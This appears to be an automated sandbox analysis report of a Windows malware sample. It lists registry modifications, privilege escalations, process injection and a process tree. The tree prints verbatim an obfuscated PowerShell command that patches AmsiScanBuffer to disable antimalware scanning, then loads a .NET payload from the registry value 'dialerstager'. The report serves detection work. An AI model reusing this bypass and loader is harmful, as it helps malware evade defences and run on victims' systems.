svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 20 Mar 2023 12:08:22 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sysmon.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE -
Modifies registry class 30 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Internet Options" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SensorsCpl.dll,-1#immutable1 = "Location Settings" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\mmsys.cpl,-300#immutable1 = "Sound" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\intl.cpl,-3#immutable1 = "Region" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Color Management" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Device Encryption" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Phone and Modem" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Credential Manager" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Firewall" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "System" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\main.cpl,-102#immutable1 = "Keyboard" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\sud.dll,-1#immutable1 = "Default Programs" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fhcpl.dll,-52#immutable1 = "File History" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recovery" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\hgcpl.dll,-1#immutable1 = "HomeGroup" RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4192 WinUIUpdate.exe 4192 WinUIUpdate.exe 4616 powershell.exe 4616 powershell.exe 4616 powershell.exe 4192 WinUIUpdate.exe 4192 WinUIUpdate.exe 4192 WinUIUpdate.exe 4192 WinUIUpdate.exe 4192 WinUIUpdate.exe 4192 WinUIUpdate.exe 4068 powershell.exe 4068 powershell.exe 4068 powershell.exe 4192 WinUIUpdate.exe 4192 WinUIUpdate.exe 1800 powershell.EXE 1800 powershell.EXE 1800 powershell.EXE 4360 powershell.EXE 1800 powershell.EXE 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 4360 powershell.EXE 2500 dllhost.exe 2500 dllhost.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1208 WerFault.exe 1136 WerFault.exe 1136 WerFault.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe 2500 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3148 Explorer.EXE -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 632 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4616 powershell.exe Token: SeIncreaseQuotaPrivilege 4616 powershell.exe Token: SeSecurityPrivilege 4616 powershell.exe Token: SeTakeOwnershipPrivilege 4616 powershell.exe Token: SeLoadDriverPrivilege 4616 powershell.exe Token: SeSystemProfilePrivilege 4616 powershell.exe Token: SeSystemtimePrivilege 4616 powershell.exe Token: SeProfSingleProcessPrivilege 4616 powershell.exe Token: SeIncBasePriorityPrivilege 4616 powershell.exe Token: SeCreatePagefilePrivilege 4616 powershell.exe Token: SeBackupPrivilege 4616 powershell.exe Token: SeRestorePrivilege 4616 powershell.exe Token: SeShutdownPrivilege 4616 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeSystemEnvironmentPrivilege 4616 powershell.exe Token: SeRemoteShutdownPrivilege 4616 powershell.exe Token: SeUndockPrivilege 4616 powershell.exe Token: SeManageVolumePrivilege 4616 powershell.exe Token: 33 4616 powershell.exe Token: 34 4616 powershell.exe Token: 35 4616 powershell.exe Token: 36 4616 powershell.exe Token: SeShutdownPrivilege 4276 powercfg.exe Token: SeCreatePagefilePrivilege 4276 powercfg.exe Token: SeDebugPrivilege 4068 powershell.exe Token: SeShutdownPrivilege 4584 powercfg.exe Token: SeCreatePagefilePrivilege 4584 powercfg.exe Token: SeShutdownPrivilege 4916 powercfg.exe Token: SeCreatePagefilePrivilege 4916 powercfg.exe Token: SeShutdownPrivilege 1308 powercfg.exe Token: SeCreatePagefilePrivilege 1308 powercfg.exe Token: SeIncreaseQuotaPrivilege 4068 powershell.exe Token: SeSecurityPrivilege 4068 powershell.exe Token: SeTakeOwnershipPrivilege 4068 powershell.exe Token: SeLoadDriverPrivilege 4068 powershell.exe Token: SeSystemProfilePrivilege 4068 powershell.exe Token: SeSystemtimePrivilege 4068 powershell.exe Token: SeProfSingleProcessPrivilege 4068 powershell.exe Token: SeIncBasePriorityPrivilege 4068 powershell.exe Token: SeCreatePagefilePrivilege 4068 powershell.exe Token: SeBackupPrivilege 4068 powershell.exe Token: SeRestorePrivilege 4068 powershell.exe Token: SeShutdownPrivilege 4068 powershell.exe Token: SeDebugPrivilege 4068 powershell.exe Token: SeSystemEnvironmentPrivilege 4068 powershell.exe Token: SeRemoteShutdownPrivilege 4068 powershell.exe Token: SeUndockPrivilege 4068 powershell.exe Token: SeManageVolumePrivilege 4068 powershell.exe Token: 33 4068 powershell.exe Token: 34 4068 powershell.exe Token: 35 4068 powershell.exe Token: 36 4068 powershell.exe Token: SeIncreaseQuotaPrivilege 4068 powershell.exe Token: SeSecurityPrivilege 4068 powershell.exe Token: SeTakeOwnershipPrivilege 4068 powershell.exe Token: SeLoadDriverPrivilege 4068 powershell.exe Token: SeSystemProfilePrivilege 4068 powershell.exe Token: SeSystemtimePrivilege 4068 powershell.exe Token: SeProfSingleProcessPrivilege 4068 powershell.exe Token: SeIncBasePriorityPrivilege 4068 powershell.exe Token: SeCreatePagefilePrivilege 4068 powershell.exe Token: SeBackupPrivilege 4068 powershell.exe Token: SeRestorePrivilege 4068 powershell.exe Token: SeShutdownPrivilege 4068 powershell.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 1008 dwm.exe 1008 dwm.exe 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 2600 firefox.exe 2600 firefox.exe 2600 firefox.exe 2600 firefox.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 3148 Explorer.EXE 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 3032 ApplicationFrameHost.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe 1008 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE 3148 Explorer.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3148 Explorer.EXE 2600 firefox.exe 3032 ApplicationFrameHost.exe 3148 Explorer.EXE 2096 SystemSettings.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3660 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4444 wrote to memory of 4628 4444 cmd.exe 75 PID 4444 wrote to memory of 4628 4444 cmd.exe 75 PID 1388 wrote to memory of 4276 1388 cmd.exe 76 PID 1388 wrote to memory of 4276 1388 cmd.exe 76 PID 4444 wrote to memory of 3652 4444 cmd.exe 77 PID 4444 wrote to memory of 3652 4444 cmd.exe 77 PID 1388 wrote to memory of 4584 1388 cmd.exe 78 PID 1388 wrote to memory of 4584 1388 cmd.exe 78 PID 4444 wrote to memory of 4656 4444 cmd.exe 79 PID 4444 wrote to memory of 4656 4444 cmd.exe 79 PID 1388 wrote to memory of 4916 1388 cmd.exe 80 PID 1388 wrote to memory of 4916 1388 cmd.exe 80 PID 1388 wrote to memory of 1308 1388 cmd.exe 81 PID 1388 wrote to memory of 1308 1388 cmd.exe 81 PID 4444 wrote to memory of 2948 4444 cmd.exe 82 PID 4444 wrote to memory of 2948 4444 cmd.exe 82 PID 4444 wrote to memory of 3756 4444 cmd.exe 83 PID 4444 wrote to memory of 3756 4444 cmd.exe 83 PID 4444 wrote to memory of 3200 4444 cmd.exe 84 PID 4444 wrote to memory of 3200 4444 cmd.exe 84 PID 4444 wrote to memory of 5000 4444 cmd.exe 85 PID 4444 wrote to memory of 5000 4444 cmd.exe 85 PID 4444 wrote to memory of 4352 4444 cmd.exe 86 PID 4444 wrote to memory of 4352 4444 cmd.exe 86 PID 4444 wrote to memory of 4200 4444 cmd.exe 87 PID 4444 wrote to memory of 4200 4444 cmd.exe 87 PID 4444 wrote to memory of 5044 4444 cmd.exe 88 PID 4444 wrote to memory of 5044 4444 cmd.exe 88 PID 4192 wrote to memory of 5032 4192 WinUIUpdate.exe 90 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 1800 wrote to memory of 2500 1800 powershell.EXE 95 PID 2500 wrote to memory of 604 2500 dllhost.exe 3 PID 2500 wrote to memory of 664 2500 dllhost.exe 1 PID 2500 wrote to memory of 764 2500 dllhost.exe 21 PID 2500 wrote to memory of 920 2500 dllhost.exe 17 PID 2500 wrote to memory of 1008 2500 dllhost.exe 10 PID 2500 wrote to memory of 380 2500 dllhost.exe 11 PID 2500 wrote to memory of 728 2500 dllhost.exe 15 PID 2500 wrote to memory of 416 2500 dllhost.exe 12 PID 2500 wrote to memory of 1052 2500 dllhost.exe 13 PID 2500 wrote to memory of 1100 2500 dllhost.exe 16 PID 2500 wrote to memory of 1152 2500 dllhost.exe 18 PID 2500 wrote to memory of 1168 2500 dllhost.exe 20 PID 2500 wrote to memory of 1184 2500 dllhost.exe 22 PID 2500 wrote to memory of 1312 2500 dllhost.exe 24 PID 2500 wrote to memory of 1412 2500 dllhost.exe 25 PID 2500 wrote to memory of 1428 2500 dllhost.exe 26 PID 2500 wrote to memory of 1444 2500 dllhost.exe 27 PID 2500 wrote to memory of 1488 2500 dllhost.exe 28 PID 2500 wrote to memory of 1568 2500 dllhost.exe 29 PID 2500 wrote to memory of 1608 2500 dllhost.exe 31 PID 2500 wrote to memory of 1624 2500 dllhost.exe 30 PID 2500 wrote to memory of 1744 2500 dllhost.exe 35 PID 2500 wrote to memory of 1752 2500 dllhost.exe 33 PID 2500 wrote to memory of 1828 2500 dllhost.exe 32 PID 2500 wrote to memory of 1864 2500 dllhost.exe 34 PID 2500 wrote to memory of 1880 2500 dllhost.exe 36 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:664
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:604
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
PID:1008
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e334abd6-6cc0-45a5-b865-fa6a4bda805f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2500
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:380
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:416
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1052
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2940
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:xHRyIsOXIgCy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fEhNMJksXFrLti,[Parameter(Position=1)][Type]$jusdMtPRmM)$enbTzBIlykA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'fl'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+[Char](109)+'o'+'r'+'y'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+'pe',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+'le'+'d'+''+[Char](44)+''+'A'+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'Cl'+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$enbTzBIlykA.DefineConstructor(''+'R'+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fEhNMJksXFrLti).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+'na'+[Char](103)+'ed');$enbTzBIlykA.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](72)+'i'+'d'+''+'e'+'B'+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'N'+'ew'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+'a'+[Char](108)+'',$jusdMtPRmM,$fEhNMJksXFrLti).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $enbTzBIlykA.CreateType();}$OGkjHErnAidyj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+'U'+'n'+[Char](115)+''+'a'+''+[Char](102)+'eO'+[Char](71)+''+[Char](107)+'jHE'+'r'+'n'+'A'+'i'+'d'+'y'+'j'+'');$JrEheVpqUQJsVV=$OGkjHErnAidyj.GetMethod(''+[Char](74)+'rE'+[Char](104)+''+'e'+''+[Char](86)+''+[Char](112)+'q'+'U'+''+[Char](81)+'J'+'s'+''+'V'+''+[Char](86)+'',[Reflection.BindingFlags]'Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wItFnNBupUOBXHEpyWH=xHRyIsOXIgCy @([String])([IntPtr]);$sxZoNIXqazoJNGqdvqMBkv=xHRyIsOXIgCy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aMYwWYNLcNc=$OGkjHErnAidyj.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$BxQxYRNlFhiWeU=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$aMYwWYNLcNc,[Object](''+'L'+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+'ry'+[Char](65)+'')));$GpZabUyBODTkoBeoN=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$aMYwWYNLcNc,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+'t')));$yOzDmLs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BxQxYRNlFhiWeU,$wItFnNBupUOBXHEpyWH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$cpLXoFEcHsvSGBtKu=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$yOzDmLs,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$gifkQTmckc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GpZabUyBODTkoBeoN,$sxZoNIXqazoJNGqdvqMBkv).Invoke($cpLXoFEcHsvSGBtKu,[uint32]8,4,[ref]$gifkQTmckc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$cpLXoFEcHsvSGBtKu,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GpZabUyBODTkoBeoN,$sxZoNIXqazoJNGqdvqMBkv).Invoke($cpLXoFEcHsvSGBtKu,[uint32]8,0x20,[ref]$gifkQTmckc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+'d'+''+'i'+'a'+'l'+''+'e'+''+[Char](114)+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2680
-
-
-
